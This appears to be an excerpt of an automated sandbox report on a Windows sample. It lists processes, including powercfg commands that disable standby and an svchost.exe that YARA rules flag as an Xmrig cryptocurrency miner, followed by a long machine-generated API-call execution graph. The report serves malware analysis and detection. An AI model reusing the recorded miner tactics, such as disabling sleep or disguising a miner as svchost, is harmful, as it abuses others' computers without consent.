                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:24
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:27
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:svchost.exe
                                                                      Imagebase:0x7ff6eef20000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:12.8%
                                                                        Total number of Nodes:1327
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 3760 7ff64fe01e65 3761 7ff64fe01e67 signal 3760->3761 3762 7ff64fe01e7c 3761->3762 3764 7ff64fe01e99 3761->3764 3763 7ff64fe01e82 signal 3762->3763 3762->3764 3763->3764 3658 7ff64fe01404 3659 7ff64fe01394 2 API calls 3658->3659 3660 7ff64fe01413 3659->3660 3661 7ff64fe01422 3660->3661 3662 7ff64fe01394 2 API calls 3660->3662 3663 7ff64fe01394 2 API calls 3661->3663 3662->3661 3664 7ff64fe0142c 3663->3664 3665 7ff64fe01431 3664->3665 3666 7ff64fe01394 2 API calls 3664->3666 3667 7ff64fe01394 2 API calls 3665->3667 3666->3665 3668 7ff64fe0143b 3667->3668 3669 7ff64fe01394 2 API calls 3668->3669 3670 7ff64fe01440 3669->3670 3671 7ff64fe01394 2 API calls 3670->3671 3672 7ff64fe0144f 3671->3672 3673 7ff64fe01394 2 API calls 3672->3673 3674 7ff64fe0145e 3673->3674 3675 7ff64fe01394 2 API calls 3674->3675 3676 7ff64fe0146d 3675->3676 3677 7ff64fe01394 2 API calls 3676->3677 3678 7ff64fe0147c 3677->3678 3679 7ff64fe01394 2 API calls 3678->3679 3680 7ff64fe0148b 3679->3680 3681 7ff64fe01394 2 API calls 3680->3681 3682 7ff64fe0149a 3681->3682 3683 7ff64fe01394 2 API calls 3682->3683 3684 7ff64fe014a9 3683->3684 3685 7ff64fe01394 2 API calls 3684->3685 3686 7ff64fe014b8 3685->3686 3687 7ff64fe01394 2 API calls 3686->3687 3688 7ff64fe014c7 3687->3688 3689 7ff64fe01394 2 API calls 3688->3689 3690 7ff64fe014d6 3689->3690 3691 7ff64fe01394 2 API calls 3690->3691 3692 7ff64fe014e5 3691->3692 3693 7ff64fe01394 2 API calls 3692->3693 3694 7ff64fe014f4 3693->3694 3695 7ff64fe01394 2 API calls 3694->3695 3696 7ff64fe01503 3695->3696 3697 7ff64fe01394 2 API calls 3696->3697 3698 7ff64fe01512 3697->3698 3699 7ff64fe01394 2 API calls 3698->3699 3700 7ff64fe01521 3699->3700 3701 7ff64fe01530 3700->3701 3702 7ff64fe01394 2 API calls 3700->3702 3703 7ff64fe01394 2 API calls 3701->3703 3702->3701 3704 7ff64fe0153a 3703->3704 3705 7ff64fe01394 2 API calls 3704->3705 3706 7ff64fe0153f 3705->3706 3707 7ff64fe01394 2 API calls 3706->3707 3708 7ff64fe0154e 3707->3708 3709 7ff64fe01394 2 API calls 3708->3709 3710 7ff64fe0155d 3709->3710 3711 7ff64fe01394 2 API calls 3710->3711 3712 7ff64fe0156c 3711->3712 3713 7ff64fe01394 2 API calls 3712->3713 3714 7ff64fe0157b 3713->3714 3715 7ff64fe01394 2 API calls 3714->3715 3716 7ff64fe0158a 3715->3716 3717 7ff64fe01394 2 API calls 3716->3717 3718 7ff64fe01599 3717->3718 3719 7ff64fe01394 2 API calls 3718->3719 3720 7ff64fe015a8 3719->3720 3721 7ff64fe01394 2 API calls 3720->3721 3722 7ff64fe015b7 3721->3722 3723 7ff64fe01394 2 API calls 3722->3723 3724 7ff64fe015c6 3723->3724 3725 7ff64fe01394 2 API calls 3724->3725 3726 7ff64fe015d5 3725->3726 3727 7ff64fe01394 2 API calls 3726->3727 3728 7ff64fe015e4 3727->3728 3729 7ff64fe01394 2 API calls 3728->3729 3730 7ff64fe015f3 3729->3730 3731 7ff64fe02104 3732 7ff64fe02111 EnterCriticalSection 3731->3732 3733 7ff64fe02218 3731->3733 3735 7ff64fe0220b LeaveCriticalSection 3732->3735 3739 7ff64fe0212e 3732->3739 3734 7ff64fe02272 3733->3734 3736 7ff64fe02241 DeleteCriticalSection 3733->3736 3738 7ff64fe02230 free 3733->3738 3735->3733 3736->3734 3737 7ff64fe0214d TlsGetValue GetLastError 3737->3739 3738->3736 3738->3738 3739->3735 3739->3737 3786 7ff64fe01ac3 3787 7ff64fe01a70 3786->3787 3788 7ff64fe0199e 3787->3788 3789 7ff64fe01b36 3787->3789 3794 7ff64fe01b5c 3787->3794 3790 7ff64fe01a0f 3788->3790 3793 7ff64fe019e9 VirtualProtect 3788->3793 3791 7ff64fe01ba0 4 API calls 3789->3791 3792 7ff64fe01b53 3791->3792 3793->3788 2425 7ff64fe01140 2428 7ff64fe01160 2425->2428 2427 7ff64fe01156 2429 7ff64fe0118b 2428->2429 2430 7ff64fe011b9 2428->2430 2429->2430 2431 7ff64fe01190 2429->2431 2432 7ff64fe011d3 2430->2432 2433 7ff64fe011c7 _amsg_exit 2430->2433 2431->2430 2434 7ff64fe011a0 Sleep 2431->2434 2435 7ff64fe01201 _initterm 2432->2435 2436 7ff64fe0121a 2432->2436 2433->2432 2434->2430 2434->2431 2435->2436 2453 7ff64fe01880 2436->2453 2439 7ff64fe0126a 2440 7ff64fe0126f malloc 2439->2440 2441 7ff64fe0128b 2440->2441 2444 7ff64fe012d2 2440->2444 2442 7ff64fe012a0 strlen malloc memcpy 2441->2442 2442->2442 2443 7ff64fe012d0 2442->2443 2443->2444 2466 7ff64fe03b50 2444->2466 2446 7ff64fe01315 2447 7ff64fe01344 2446->2447 2448 7ff64fe01324 2446->2448 2451 7ff64fe01160 88 API calls 2447->2451 2449 7ff64fe0132d _cexit 2448->2449 2450 7ff64fe01338 2448->2450 2449->2450 2450->2427 2452 7ff64fe01366 2451->2452 2452->2427 2454 7ff64fe01247 SetUnhandledExceptionFilter 2453->2454 2455 7ff64fe018a2 2453->2455 2454->2439 2455->2454 2456 7ff64fe0194d 2455->2456 2461 7ff64fe01a20 2455->2461 2457 7ff64fe0199e 2456->2457 2458 7ff64fe01956 2456->2458 2457->2454 2460 7ff64fe019e9 VirtualProtect 2457->2460 2458->2457 2623 7ff64fe01ba0 2458->2623 2460->2457 2461->2457 2462 7ff64fe01b5c 2461->2462 2463 7ff64fe01b36 2461->2463 2464 7ff64fe01ba0 4 API calls 2463->2464 2465 7ff64fe01b53 2464->2465 2469 7ff64fe03b66 2466->2469 2467 7ff64fe03c60 wcslen 2633 7ff64fe0153f 2467->2633 2469->2467 2473 7ff64fe03d60 2476 7ff64fe03d7a memset wcscat memset 2473->2476 2478 7ff64fe03dd3 2476->2478 2479 7ff64fe03e23 wcslen 2478->2479 2480 7ff64fe03e35 2479->2480 2484 7ff64fe03e7c 2479->2484 2481 7ff64fe03e50 _wcsnicmp 2480->2481 2482 7ff64fe03e66 wcslen 2481->2482 2481->2484 2482->2481 2482->2484 2483 7ff64fe03edd wcscpy wcscat memset 2486 7ff64fe03f1c 2483->2486 2484->2483 2485 7ff64fe04024 wcscpy wcscat memset 2487 7ff64fe0405f 2485->2487 2486->2485 2488 7ff64fe04381 wcslen 2487->2488 2489 7ff64fe0438f 2488->2489 2498 7ff64fe043cc 2488->2498 2490 7ff64fe043a0 _wcsnicmp 2489->2490 2491 7ff64fe043b6 wcslen 2490->2491 2490->2498 2491->2490 2491->2498 2492 7ff64fe04456 wcscpy wcscat _wcsicmp 2493 7ff64fe044a3 memset 2492->2493 2494 7ff64fe0448a 2492->2494 2496 7ff64fe044c4 2493->2496 2769 7ff64fe014d6 2494->2769 2497 7ff64fe04509 wcscpy wcscat memset 2496->2497 2500 7ff64fe0454f 2497->2500 2498->2492 2499 7ff64fe045b4 wcscpy wcscat memset 2501 7ff64fe045fa 2499->2501 2500->2499 2502 7ff64fe0462a wcscpy wcscat memset 2501->2502 2504 7ff64fe04670 2502->2504 2503 7ff64fe046e0 wcscpy wcscat 2505 7ff64fe04712 2503->2505 2504->2503 2810 7ff64fe02df0 2505->2810 2507 7ff64fe02df0 11 API calls 2510 7ff64fe0492f 2507->2510 2508 7ff64fe0481a 2508->2507 2509 7ff64fe02df0 11 API calls 2512 7ff64fe04a19 2509->2512 2510->2509 2511 7ff64fe02df0 11 API calls 2513 7ff64fe04b06 2511->2513 2512->2511 2514 7ff64fe04fcb memset 2513->2514 2519 7ff64fe04b0f 2513->2519 2515 7ff64fe04fec 2514->2515 2516 7ff64fe0502f wcscpy wcscat 2515->2516 2520 7ff64fe062d1 memcpy 2516->2520 2542 7ff64fe04e7c 2516->2542 2517 7ff64fe04c29 wcslen 2822 7ff64fe0157b 2517->2822 2519->2517 2520->2542 2522 7ff64fe04cbf memset 2524 7ff64fe04ce0 2522->2524 2523 7ff64fe02df0 11 API calls 2526 7ff64fe0520c _wcsicmp 2523->2526 2525 7ff64fe04d30 wcslen 2524->2525 2839 7ff64fe015a8 2525->2839 2530 7ff64fe05227 memset 2526->2530 2546 7ff64fe055b6 2526->2546 2527 7ff64fe02df0 11 API calls 2527->2542 2528 7ff64fe04dd1 2528->2526 2528->2527 2532 7ff64fe0524b 2530->2532 2533 7ff64fe05290 wcscpy wcscat wcslen 2532->2533 2850 7ff64fe0146d 2533->2850 2534 7ff64fe0563f wcslen 2538 7ff64fe0153f 2 API calls 2534->2538 2535 7ff64fe04dc5 2539 7ff64fe0145e 2 API calls 2535->2539 2536 7ff64fe04da0 _wcsnicmp 2536->2535 2549 7ff64fe05ecc 2536->2549 2541 7ff64fe056d1 2538->2541 2539->2528 2545 7ff64fe0145e 2 API calls 2541->2545 2542->2523 2543 7ff64fe05f29 wcslen 2547 7ff64fe015a8 2 API calls 2543->2547 2550 7ff64fe056e2 2545->2550 2546->2534 2551 7ff64fe05f85 2547->2551 2549->2543 2561 7ff64fe0576e 2550->2561 3101 7ff64fe02f70 2550->3101 2554 7ff64fe0145e 2 API calls 2551->2554 2552 7ff64fe0670d 2556 7ff64fe0145e 2 API calls 2552->2556 2553 7ff64fe0539b 2934 7ff64fe014a9 2553->2934 2554->2528 2559 7ff64fe06719 2556->2559 2557 7ff64fe057cb wcslen 2562 7ff64fe057e1 2557->2562 2585 7ff64fe0581c 2557->2585 2559->2446 2561->2557 2566 7ff64fe057f0 _wcsnicmp 2562->2566 2563 7ff64fe05437 2565 7ff64fe0145e 2 API calls 2563->2565 2564 7ff64fe0570b 3105 7ff64fe038e0 2564->3105 2570 7ff64fe0542b 2565->2570 2571 7ff64fe05806 wcslen 2566->2571 2566->2585 3042 7ff64fe03370 memset 2570->3042 2571->2566 2571->2585 2573 7ff64fe014c7 2 API calls 2577 7ff64fe05760 2573->2577 2574 7ff64fe0541f 2579 7ff64fe0145e 2 API calls 2574->2579 2575 7ff64fe05956 memset wcscpy wcscat 2576 7ff64fe02f70 2 API calls 2575->2576 2580 7ff64fe059ad 2576->2580 2577->2561 2583 7ff64fe0145e 2 API calls 2577->2583 2579->2570 2582 7ff64fe03370 11 API calls 2580->2582 2586 7ff64fe059c5 2582->2586 2583->2561 2585->2575 2588 7ff64fe014c7 2 API calls 2586->2588 2589 7ff64fe059f3 memset 2588->2589 2595 7ff64fe05a14 2589->2595 2590 7ff64fe05863 2592 7ff64fe02df0 11 API calls 2590->2592 2591 7ff64fe05a64 wcslen 2596 7ff64fe05ab7 wcscat memset 2591->2596 2597 7ff64fe05a76 2591->2597 2598 7ff64fe055b1 2592->2598 2593 7ff64fe05492 2594 7ff64fe02df0 11 API calls 2593->2594 2605 7ff64fe0551b 2594->2605 2595->2591 2603 7ff64fe05af1 2596->2603 2599 7ff64fe05a90 _wcsnicmp 2597->2599 2598->2446 2599->2596 2601 7ff64fe05aa2 wcslen 2599->2601 2601->2596 2601->2599 2602 7ff64fe05b54 wcscpy wcscat 2607 7ff64fe05b89 2602->2607 2603->2602 2604 7ff64fe02df0 11 API calls 2604->2598 2605->2604 2606 7ff64fe06593 memcpy 2609 7ff64fe05cb1 2606->2609 2607->2606 2607->2609 2608 7ff64fe05d6f wcslen 2610 7ff64fe0153f 2 API calls 2608->2610 2609->2608 2611 7ff64fe05dfa 2610->2611 2612 7ff64fe0145e 2 API calls 2611->2612 2613 7ff64fe05e0b 2612->2613 2614 7ff64fe05ea3 2613->2614 2616 7ff64fe02f70 2 API calls 2613->2616 2615 7ff64fe0145e 2 API calls 2614->2615 2615->2598 2617 7ff64fe05e38 2616->2617 2618 7ff64fe038e0 11 API calls 2617->2618 2619 7ff64fe05e5d 2618->2619 2620 7ff64fe014c7 2 API calls 2619->2620 2621 7ff64fe05e95 2620->2621 2621->2614 2622 7ff64fe0145e 2 API calls 2621->2622 2622->2614 2625 7ff64fe01bc2 2623->2625 2624 7ff64fe01c04 memcpy 2624->2458 2625->2624 2627 7ff64fe01c45 VirtualQuery 2625->2627 2628 7ff64fe01cf4 2625->2628 2627->2628 2629 7ff64fe01c72 2627->2629 2630 7ff64fe01d23 GetLastError 2628->2630 2629->2624 2632 7ff64fe01ca4 VirtualProtect 2629->2632 2631 7ff64fe01d37 2630->2631 2632->2624 2632->2630 3128 7ff64fe01394 2633->3128 2635 7ff64fe0154e 2636 7ff64fe01394 2 API calls 2635->2636 2637 7ff64fe0155d 2636->2637 2638 7ff64fe01394 2 API calls 2637->2638 2639 7ff64fe0156c 2638->2639 2640 7ff64fe01394 2 API calls 2639->2640 2641 7ff64fe0157b 2640->2641 2642 7ff64fe01394 2 API calls 2641->2642 2643 7ff64fe0158a 2642->2643 2644 7ff64fe01394 2 API calls 2643->2644 2645 7ff64fe01599 2644->2645 2646 7ff64fe01394 2 API calls 2645->2646 2647 7ff64fe015a8 2646->2647 2648 7ff64fe01394 2 API calls 2647->2648 2649 7ff64fe015b7 2648->2649 2650 7ff64fe01394 2 API calls 2649->2650 2651 7ff64fe015c6 2650->2651 2652 7ff64fe01394 2 API calls 2651->2652 2653 7ff64fe015d5 2652->2653 2654 7ff64fe01394 2 API calls 2653->2654 2655 7ff64fe015e4 2654->2655 2656 7ff64fe01394 2 API calls 2655->2656 2657 7ff64fe015f3 2656->2657 2657->2598 2658 7ff64fe01503 2657->2658 2659 7ff64fe01394 2 API calls 2658->2659 2660 7ff64fe01512 2659->2660 2661 7ff64fe01394 2 API calls 2660->2661 2662 7ff64fe01521 2661->2662 2663 7ff64fe01530 2662->2663 2664 7ff64fe01394 2 API calls 2662->2664 2665 7ff64fe01394 2 API calls 2663->2665 2664->2663 2666 7ff64fe0153a 2665->2666 2667 7ff64fe01394 2 API calls 2666->2667 2668 7ff64fe0153f 2667->2668 2669 7ff64fe01394 2 API calls 2668->2669 2670 7ff64fe0154e 2669->2670 2671 7ff64fe01394 2 API calls 2670->2671 2672 7ff64fe0155d 2671->2672 2673 7ff64fe01394 2 API calls 2672->2673 2674 7ff64fe0156c 2673->2674 2675 7ff64fe01394 2 API calls 2674->2675 2676 7ff64fe0157b 2675->2676 2677 7ff64fe01394 2 API calls 2676->2677 2678 7ff64fe0158a 2677->2678 2679 7ff64fe01394 2 API calls 2678->2679 2680 7ff64fe01599 2679->2680 2681 7ff64fe01394 2 API calls 2680->2681 2682 7ff64fe015a8 2681->2682 2683 7ff64fe01394 2 API calls 2682->2683 2684 7ff64fe015b7 2683->2684 2685 7ff64fe01394 2 API calls 2684->2685 2686 7ff64fe015c6 2685->2686 2687 7ff64fe01394 2 API calls 2686->2687 2688 7ff64fe015d5 2687->2688 2689 7ff64fe01394 2 API calls 2688->2689 2690 7ff64fe015e4 2689->2690 2691 7ff64fe01394 2 API calls 2690->2691 2692 7ff64fe015f3 2691->2692 2692->2473 2693 7ff64fe0156c 2692->2693 2694 7ff64fe01394 2 API calls 2693->2694 2695 7ff64fe0157b 2694->2695 2696 7ff64fe01394 2 API calls 2695->2696 2697 7ff64fe0158a 2696->2697 2698 7ff64fe01394 2 API calls 2697->2698 2699 7ff64fe01599 2698->2699 2700 7ff64fe01394 2 API calls 2699->2700 2701 7ff64fe015a8 2700->2701 2702 7ff64fe01394 2 API calls 2701->2702 2703 7ff64fe015b7 2702->2703 2704 7ff64fe01394 2 API calls 2703->2704 2705 7ff64fe015c6 2704->2705 2706 7ff64fe01394 2 API calls 2705->2706 2707 7ff64fe015d5 2706->2707 2708 7ff64fe01394 2 API calls 2707->2708 2709 7ff64fe015e4 2708->2709 2710 7ff64fe01394 2 API calls 2709->2710 2711 7ff64fe015f3 2710->2711 2711->2473 2712 7ff64fe0145e 2711->2712 2713 7ff64fe01394 2 API calls 2712->2713 2714 7ff64fe0146d 2713->2714 2715 7ff64fe01394 2 API calls 2714->2715 2716 7ff64fe0147c 2715->2716 2717 7ff64fe01394 2 API calls 2716->2717 2718 7ff64fe0148b 2717->2718 2719 7ff64fe01394 2 API calls 2718->2719 2720 7ff64fe0149a 2719->2720 2721 7ff64fe01394 2 API calls 2720->2721 2722 7ff64fe014a9 2721->2722 2723 7ff64fe01394 2 API calls 2722->2723 2724 7ff64fe014b8 2723->2724 2725 7ff64fe01394 2 API calls 2724->2725 2726 7ff64fe014c7 2725->2726 2727 7ff64fe01394 2 API calls 2726->2727 2728 7ff64fe014d6 2727->2728 2729 7ff64fe01394 2 API calls 2728->2729 2730 7ff64fe014e5 2729->2730 2731 7ff64fe01394 2 API calls 2730->2731 2732 7ff64fe014f4 2731->2732 2733 7ff64fe01394 2 API calls 2732->2733 2734 7ff64fe01503 2733->2734 2735 7ff64fe01394 2 API calls 2734->2735 2736 7ff64fe01512 2735->2736 2737 7ff64fe01394 2 API calls 2736->2737 2738 7ff64fe01521 2737->2738 2739 7ff64fe01530 2738->2739 2740 7ff64fe01394 2 API calls 2738->2740 2741 7ff64fe01394 2 API calls 2739->2741 2740->2739 2742 7ff64fe0153a 2741->2742 2743 7ff64fe01394 2 API calls 2742->2743 2744 7ff64fe0153f 2743->2744 2745 7ff64fe01394 2 API calls 2744->2745 2746 7ff64fe0154e 2745->2746 2747 7ff64fe01394 2 API calls 2746->2747 2748 7ff64fe0155d 2747->2748 2749 7ff64fe01394 2 API calls 2748->2749 2750 7ff64fe0156c 2749->2750 2751 7ff64fe01394 2 API calls 2750->2751 2752 7ff64fe0157b 2751->2752 2753 7ff64fe01394 2 API calls 2752->2753 2754 7ff64fe0158a 2753->2754 2755 7ff64fe01394 2 API calls 2754->2755 2756 7ff64fe01599 2755->2756 2757 7ff64fe01394 2 API calls 2756->2757 2758 7ff64fe015a8 2757->2758 2759 7ff64fe01394 2 API calls 2758->2759 2760 7ff64fe015b7 2759->2760 2761 7ff64fe01394 2 API calls 2760->2761 2762 7ff64fe015c6 2761->2762 2763 7ff64fe01394 2 API calls 2762->2763 2764 7ff64fe015d5 2763->2764 2765 7ff64fe01394 2 API calls 2764->2765 2766 7ff64fe015e4 2765->2766 2767 7ff64fe01394 2 API calls 2766->2767 2768 7ff64fe015f3 2767->2768 2768->2473 2770 7ff64fe01394 2 API calls 2769->2770 2771 7ff64fe014e5 2770->2771 2772 7ff64fe01394 2 API calls 2771->2772 2773 7ff64fe014f4 2772->2773 2774 7ff64fe01394 2 API calls 2773->2774 2775 7ff64fe01503 2774->2775 2776 7ff64fe01394 2 API calls 2775->2776 2777 7ff64fe01512 2776->2777 2778 7ff64fe01394 2 API calls 2777->2778 2779 7ff64fe01521 2778->2779 2780 7ff64fe01530 2779->2780 2781 7ff64fe01394 2 API calls 2779->2781 2782 7ff64fe01394 2 API calls 2780->2782 2781->2780 2783 7ff64fe0153a 2782->2783 2784 7ff64fe01394 2 API calls 2783->2784 2785 7ff64fe0153f 2784->2785 2786 7ff64fe01394 2 API calls 2785->2786 2787 7ff64fe0154e 2786->2787 2788 7ff64fe01394 2 API calls 2787->2788 2789 7ff64fe0155d 2788->2789 2790 7ff64fe01394 2 API calls 2789->2790 2791 7ff64fe0156c 2790->2791 2792 7ff64fe01394 2 API calls 2791->2792 2793 7ff64fe0157b 2792->2793 2794 7ff64fe01394 2 API calls 2793->2794 2795 7ff64fe0158a 2794->2795 2796 7ff64fe01394 2 API calls 2795->2796 2797 7ff64fe01599 2796->2797 2798 7ff64fe01394 2 API calls 2797->2798 2799 7ff64fe015a8 2798->2799 2800 7ff64fe01394 2 API calls 2799->2800 2801 7ff64fe015b7 2800->2801 2802 7ff64fe01394 2 API calls 2801->2802 2803 7ff64fe015c6 2802->2803 2804 7ff64fe01394 2 API calls 2803->2804 2805 7ff64fe015d5 2804->2805 2806 7ff64fe01394 2 API calls 2805->2806 2807 7ff64fe015e4 2806->2807 2808 7ff64fe01394 2 API calls 2807->2808 2809 7ff64fe015f3 2808->2809 2809->2493 3132 7ff64fe02660 2810->3132 2812 7ff64fe02e00 memset 2816 7ff64fe02e3c 2812->2816 2815 7ff64fe0145e 2 API calls 2817 7ff64fe02f35 2815->2817 3134 7ff64fe02690 2816->3134 2818 7ff64fe02f53 2817->2818 3167 7ff64fe01512 2817->3167 2820 7ff64fe0145e 2 API calls 2818->2820 2821 7ff64fe02f5d 2820->2821 2821->2508 2823 7ff64fe01394 2 API calls 2822->2823 2824 7ff64fe0158a 2823->2824 2825 7ff64fe01394 2 API calls 2824->2825 2826 7ff64fe01599 2825->2826 2827 7ff64fe01394 2 API calls 2826->2827 2828 7ff64fe015a8 2827->2828 2829 7ff64fe01394 2 API calls 2828->2829 2830 7ff64fe015b7 2829->2830 2831 7ff64fe01394 2 API calls 2830->2831 2832 7ff64fe015c6 2831->2832 2833 7ff64fe01394 2 API calls 2832->2833 2834 7ff64fe015d5 2833->2834 2835 7ff64fe01394 2 API calls 2834->2835 2836 7ff64fe015e4 2835->2836 2837 7ff64fe01394 2 API calls 2836->2837 2838 7ff64fe015f3 2837->2838 2838->2522 2838->2528 2840 7ff64fe01394 2 API calls 2839->2840 2841 7ff64fe015b7 2840->2841 2842 7ff64fe01394 2 API calls 2841->2842 2843 7ff64fe015c6 2842->2843 2844 7ff64fe01394 2 API calls 2843->2844 2845 7ff64fe015d5 2844->2845 2846 7ff64fe01394 2 API calls 2845->2846 2847 7ff64fe015e4 2846->2847 2848 7ff64fe01394 2 API calls 2847->2848 2849 7ff64fe015f3 2848->2849 2849->2535 2849->2536 2851 7ff64fe01394 2 API calls 2850->2851 2852 7ff64fe0147c 2851->2852 2853 7ff64fe01394 2 API calls 2852->2853 2854 7ff64fe0148b 2853->2854 2855 7ff64fe01394 2 API calls 2854->2855 2856 7ff64fe0149a 2855->2856 2857 7ff64fe01394 2 API calls 2856->2857 2858 7ff64fe014a9 2857->2858 2859 7ff64fe01394 2 API calls 2858->2859 2860 7ff64fe014b8 2859->2860 2861 7ff64fe01394 2 API calls 2860->2861 2862 7ff64fe014c7 2861->2862 2863 7ff64fe01394 2 API calls 2862->2863 2864 7ff64fe014d6 2863->2864 2865 7ff64fe01394 2 API calls 2864->2865 2866 7ff64fe014e5 2865->2866 2867 7ff64fe01394 2 API calls 2866->2867 2868 7ff64fe014f4 2867->2868 2869 7ff64fe01394 2 API calls 2868->2869 2870 7ff64fe01503 2869->2870 2871 7ff64fe01394 2 API calls 2870->2871 2872 7ff64fe01512 2871->2872 2873 7ff64fe01394 2 API calls 2872->2873 2874 7ff64fe01521 2873->2874 2875 7ff64fe01530 2874->2875 2876 7ff64fe01394 2 API calls 2874->2876 2877 7ff64fe01394 2 API calls 2875->2877 2876->2875 2878 7ff64fe0153a 2877->2878 2879 7ff64fe01394 2 API calls 2878->2879 2880 7ff64fe0153f 2879->2880 2881 7ff64fe01394 2 API calls 2880->2881 2882 7ff64fe0154e 2881->2882 2883 7ff64fe01394 2 API calls 2882->2883 2884 7ff64fe0155d 2883->2884 2885 7ff64fe01394 2 API calls 2884->2885 2886 7ff64fe0156c 2885->2886 2887 7ff64fe01394 2 API calls 2886->2887 2888 7ff64fe0157b 2887->2888 2889 7ff64fe01394 2 API calls 2888->2889 2890 7ff64fe0158a 2889->2890 2891 7ff64fe01394 2 API calls 2890->2891 2892 7ff64fe01599 2891->2892 2893 7ff64fe01394 2 API calls 2892->2893 2894 7ff64fe015a8 2893->2894 2895 7ff64fe01394 2 API calls 2894->2895 2896 7ff64fe015b7 2895->2896 2897 7ff64fe01394 2 API calls 2896->2897 2898 7ff64fe015c6 2897->2898 2899 7ff64fe01394 2 API calls 2898->2899 2900 7ff64fe015d5 2899->2900 2901 7ff64fe01394 2 API calls 2900->2901 2902 7ff64fe015e4 2901->2902 2903 7ff64fe01394 2 API calls 2902->2903 2904 7ff64fe015f3 2903->2904 2905 7ff64fe01530 2904->2905 2906 7ff64fe01394 2 API calls 2905->2906 2907 7ff64fe0153a 2906->2907 2908 7ff64fe01394 2 API calls 2907->2908 2909 7ff64fe0153f 2908->2909 2910 7ff64fe01394 2 API calls 2909->2910 2911 7ff64fe0154e 2910->2911 2912 7ff64fe01394 2 API calls 2911->2912 2913 7ff64fe0155d 2912->2913 2914 7ff64fe01394 2 API calls 2913->2914 2915 7ff64fe0156c 2914->2915 2916 7ff64fe01394 2 API calls 2915->2916 2917 7ff64fe0157b 2916->2917 2918 7ff64fe01394 2 API calls 2917->2918 2919 7ff64fe0158a 2918->2919 2920 7ff64fe01394 2 API calls 2919->2920 2921 7ff64fe01599 2920->2921 2922 7ff64fe01394 2 API calls 2921->2922 2923 7ff64fe015a8 2922->2923 2924 7ff64fe01394 2 API calls 2923->2924 2925 7ff64fe015b7 2924->2925 2926 7ff64fe01394 2 API calls 2925->2926 2927 7ff64fe015c6 2926->2927 2928 7ff64fe01394 2 API calls 2927->2928 2929 7ff64fe015d5 2928->2929 2930 7ff64fe01394 2 API calls 2929->2930 2931 7ff64fe015e4 2930->2931 2932 7ff64fe01394 2 API calls 2931->2932 2933 7ff64fe015f3 2932->2933 2933->2552 2933->2553 2935 7ff64fe01394 2 API calls 2934->2935 2936 7ff64fe014b8 2935->2936 2937 7ff64fe01394 2 API calls 2936->2937 2938 7ff64fe014c7 